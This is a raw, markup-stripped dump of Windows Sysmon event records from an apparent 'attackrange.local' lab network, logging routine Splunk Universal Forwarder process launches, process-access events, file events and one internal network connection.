10341000x8000000000000000245596Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-51A4-6063-AA22-00000000AF01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245595Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.972{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A4-6063-AA22-00000000AF01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245594Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.973{CB4067E1-51A4-6063-AA22-00000000AF01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245593Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.956{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C966CE48EF83B130596E47624BD11114,SHA256=32548D5DC4E5FCE199334564514DDB876474B6E1ABD80EF3FF69BD8C44A73701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245592Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.050{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CB56570F22A9057EE642488B2BA0BC4,SHA256=8349236979B69EDBCD7278CF666C324DC6B7529A651C0E1D7AAC401BF385877F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245591Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:20.050{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A8607694866B493EB783012FECD3D51,SHA256=92151D8DAF8089DAE1833BC883A5CD50A57C4957CCD13C25EF0840EA83D94A43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060939Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:21.848{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46FC9CAB1CCE6604047E36A426A9F31,SHA256=F4A58D1D44304B0B572F0CC633811ED876D6BC5EAE9814C62DB179C8B02BDF10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245620Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A5-6063-AB22-00000000AF01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245619Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245618Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245617Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245616Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245615Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245614Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245613Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245612Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245611Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245610Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51A5-6063-AB22-00000000AF01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245609Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A5-6063-AB22-00000000AF01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245608Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:21.644{CB4067E1-51A5-6063-AB22-00000000AF01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000245607Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:19.481{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64763-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000245650Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.988{CB4067E1-51A6-6063-AD22-00000000AF01}3403524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245649Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A6-6063-AD22-00000000AF01}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245648Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245647Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245646Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245645Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245644Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245643Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:22.878{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245642Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 